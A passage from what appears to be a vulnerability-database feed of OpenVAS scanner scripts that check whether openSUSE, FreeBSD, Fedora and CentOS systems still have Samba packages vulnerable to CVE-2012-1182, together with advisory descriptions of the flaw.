isrpmvuln(pkg:\"libsmbsharemodes-devel\", rpm:\"libsmbsharemodes-devel~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes0\", rpm:\"libsmbsharemodes0~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes0-debuginfo\", rpm:\"libsmbsharemodes0-debuginfo~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc-devel\", rpm:\"libtalloc-devel~2.0.5~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc2\", rpm:\"libtalloc2~2.0.5~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc2-debuginfo\", rpm:\"libtalloc2-debuginfo~2.0.5~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb-devel\", rpm:\"libtdb-devel~1.2.9~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1\", rpm:\"libtdb1~1.2.9~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1-debuginfo\", rpm:\"libtdb1-debuginfo~1.2.9~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent-devel\", rpm:\"libtevent-devel~0.9.11~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent0\", rpm:\"libtevent0~0.9.11~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent0-debuginfo\", rpm:\"libtevent0-debuginfo~0.9.11~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient-devel\", rpm:\"libwbclient-devel~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0\", rpm:\"libwbclient0~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0-debuginfo\", rpm:\"libwbclient0-debuginfo~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-debuginfo\", rpm:\"samba-client-debuginfo~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debuginfo\", rpm:\"samba-debuginfo~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debugsource\", rpm:\"samba-debugsource~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-devel\", rpm:\"samba-devel~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-krb-printing\", rpm:\"samba-krb-printing~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-krb-printing-debuginfo\", rpm:\"samba-krb-printing-debuginfo~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-debuginfo\", rpm:\"samba-winbind-debuginfo~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libldb1-32bit\", rpm:\"libldb1-32bit~1.0.2~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libldb1-debuginfo-32bit\", rpm:\"libldb1-debuginfo-32bit~1.0.2~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-32bit\", rpm:\"libsmbclient0-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-debuginfo-32bit\", rpm:\"libsmbclient0-debuginfo-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc2-32bit\", rpm:\"libtalloc2-32bit~2.0.5~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc2-debuginfo-32bit\", rpm:\"libtalloc2-debuginfo-32bit~2.0.5~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1-32bit\", rpm:\"libtdb1-32bit~1.2.9~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1-debuginfo-32bit\", rpm:\"libtdb1-debuginfo-32bit~1.2.9~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent0-32bit\", rpm:\"libtevent0-32bit~0.9.11~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent0-debuginfo-32bit\", rpm:\"libtevent0-debuginfo-32bit~0.9.11~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0-32bit\", rpm:\"libwbclient0-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0-debuginfo-32bit\", rpm:\"libwbclient0-debuginfo-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-32bit\", rpm:\"samba-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-32bit\", rpm:\"samba-client-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-debuginfo-32bit\", rpm:\"samba-client-debuginfo-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debuginfo-32bit\", rpm:\"samba-debuginfo-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-32bit\", rpm:\"samba-winbind-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-debuginfo-32bit\", rpm:\"samba-winbind-debuginfo-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libldb1-debuginfo-x86\", rpm:\"libldb1-debuginfo-x86~1.0.2~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libldb1-x86\", rpm:\"libldb1-x86~1.0.2~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-debuginfo-x86\", rpm:\"libsmbclient0-debuginfo-x86~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-x86\", rpm:\"libsmbclient0-x86~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc2-debuginfo-x86\", rpm:\"libtalloc2-debuginfo-x86~2.0.5~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc2-x86\", rpm:\"libtalloc2-x86~2.0.5~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1-debuginfo-x86\", rpm:\"libtdb1-debuginfo-x86~1.2.9~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1-x86\", rpm:\"libtdb1-x86~1.2.9~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent0-debuginfo-x86\", rpm:\"libtevent0-debuginfo-x86~0.9.11~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent0-x86\", rpm:\"libtevent0-x86~0.9.11~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0-debuginfo-x86\", rpm:\"libwbclient0-debuginfo-x86~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0-x86\", rpm:\"libwbclient0-x86~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-debuginfo-x86\", rpm:\"samba-client-debuginfo-x86~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-x86\", rpm:\"samba-client-x86~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debuginfo-x86\", rpm:\"samba-debuginfo-x86~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-debuginfo-x86\", rpm:\"samba-winbind-debuginfo-x86~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-x86\", rpm:\"samba-winbind-x86~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-x86\", rpm:\"samba-x86~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:10:46", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "cvss3": {}, "published": "2012-04-30T00:00:00", "type": "openvas", "title": "FreeBSD Ports: samba34", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2017-04-12T00:00:00", "id": "OPENVAS:71279", "href": "http://plugins.openvas.org/nasl.php?oid=71279", "sourceData": "#\n#VID baf37cd2-8351-11e1-894e-00215c6a37bb\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID baf37cd2-8351-11e1-894e-00215c6a37bb\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n samba34\n samba35\n samba36\n\nCVE-2012-1182\nThe RPC code generator in Samba 3.x before 3.4.16, 3.5.x before\n3.5.14, and 3.6.x before 3.6.4 does not implement validation of an\narray length in a manner consistent with validation of array memory\nallocation, which allows remote attackers to execute arbitrary code\nvia a crafted RPC call.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(71279);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2012-1182\");\n script_version(\"$Revision: 5940 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-12 11:02:05 +0200 (Wed, 12 Apr 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-30 07:59:26 -0400 (Mon, 30 Apr 2012)\");\n script_name(\"FreeBSD Ports: samba34\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\nvuln = 0;\ntxt = \"\";\nbver = portver(pkg:\"samba34\");\nif(!isnull(bver) && revcomp(a:bver, b:\"3.4\")>0 && revcomp(a:bver, b:\"3.4.16\")<0) {\n txt += \"Package samba34 version \" + bver + \" is installed which is known to be vulnerable.\\n\";\n vuln = 1;\n}\nbver = portver(pkg:\"samba35\");\nif(!isnull(bver) && revcomp(a:bver, b:\"3.5\")>0 && revcomp(a:bver, b:\"3.5.14\")<0) {\n txt += \"Package samba35 version \" + bver + \" is installed which is known to be vulnerable.\\n\";\n vuln = 1;\n}\nbver = portver(pkg:\"samba36\");\nif(!isnull(bver) && revcomp(a:bver, b:\"3.6\")>0 && revcomp(a:bver, b:\"3.6.4\")<0) {\n txt += \"Package samba36 version \" + bver + \" is installed which is known to be vulnerable.\\n\";\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt ));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:07", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-05-17T00:00:00", "type": "openvas", "title": "Fedora Update for samba4 FEDORA-2012-6382", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310864238", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864238", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for samba4 FEDORA-2012-6382\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-May/080567.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864238\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-05-17 10:31:56 +0530 (Thu, 17 May 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2012-6382\");\n script_name(\"Fedora Update for samba4 FEDORA-2012-6382\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba4'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"samba4 on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"samba4\", rpm:\"samba4~4.0.0~38.alpha16.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:45", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-07-30T00:00:00", "type": "openvas", "title": "CentOS Update for libsmbclient CESA-2012:0465 centos5", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310881194", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881194", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for libsmbclient CESA-2012:0465 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2012-April/018562.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881194\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:40:05 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2012:0465\");\n script_name(\"CentOS Update for libsmbclient CESA-2012:0465 centos5\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libsmbclient'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"libsmbclient on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"Samba is an open-source implementation of the Server Message Block (SMB) or\n Common Internet File System (CIFS) protocol, which allows PC-compatible\n machines to share files, printers, and other information.\n\n A flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\n to generate code to handle RPC calls, resulted in multiple buffer overflows\n in Samba. A remote, unauthenticated attacker could send a specially-crafted\n RPC request that would cause the Samba daemon (smbd) to crash or, possibly,\n execute arbitrary code with the privileges of the root user.\n (CVE-2012-1182)\n\n Users of Samba are advised to upgrade to these updated packages, which\n contain a backported patch to resolve this issue. After installing this\n update, the smb service will be restarted automatically.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~3.0.33~3.39.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~3.0.33~3.39.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.0.33~3.39.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.0.33~3.39.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.0.33~3.39.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.0.33~3.39.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:50", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2013-03-12T00:00:00", "type": "openvas", "title": "CentOS Update for samba4 CESA-2013:0506 centos6", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310881650", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881650", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for samba4 CESA-2013:0506 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2013-March/019498.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881650\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-12 10:00:01 +0530 (Tue, 12 Mar 2013)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2013:0506\");\n script_name(\"CentOS Update for samba4 CESA-2013:0506 centos6\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba4'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n script_tag(name:\"affected\", value:\"samba4 on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"Samba is an open-source implementation of the Server Message Block (SMB) or\n Common Internet File System (CIFS) protocol, which allows PC-compatible\n machines to share files, printers, and other information.\n\n A flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\n compiler, used to generate code to handle RPC calls. This could result in\n code generated by the PIDL compiler to not sufficiently protect against\n buffer overflows. (CVE-2012-1182)\n\n The samba4 packages have been upgraded to upstream version 4.0.0, which\n provides a number of bug fixes and enhancements over the previous version.\n In particular, improved interoperability with Active Directory (AD)\n domains. SSSD now uses the libndr-krb5pac library to parse the Privilege\n Attribute Certificate (PAC) issued by an AD Key Distribution Center (KDC).\n\n The Cross Realm Kerberos Trust functionality provided by Identity\n Management, which relies on the capabilities of the samba4 client library,\n is included as a Technology Preview. This functionality and server\n libraries, is included as a Technology Preview. This functionality uses the\n libndr-nbt library to prepare Connection-less Lightweight Directory Access\n Protocol (CLDAP) messages.\n\n Additionally, various improvements have been made to the Local Security\n Authority (LSA) and Net Logon services to allow verification of trust\n from a Windows system. Because the Cross Realm Kerberos Trust functionality\n is considered a Technology Preview, selected samba4 components are\n considered to be a Technology Preview. For more information on which Samba\n packages are considered a Technology Preview, refer to Table 5.1, 'Samba4\n Package Support' in the Release Notes, linked to from the References.\n (BZ#766333, BZ#882188)\n\n This update also fixes the following bug:\n\n * Prior to this update, if the Active Directory (AD) server was rebooted,\n Winbind sometimes failed to reconnect when requested by 'wbinfo -n' or\n 'wbinfo -s' commands. Consequently, looking up users using the wbinfo tool\n failed. This update applies upstream patches to fix this problem and now\n looking up a Security Identifier (SID) for a username, 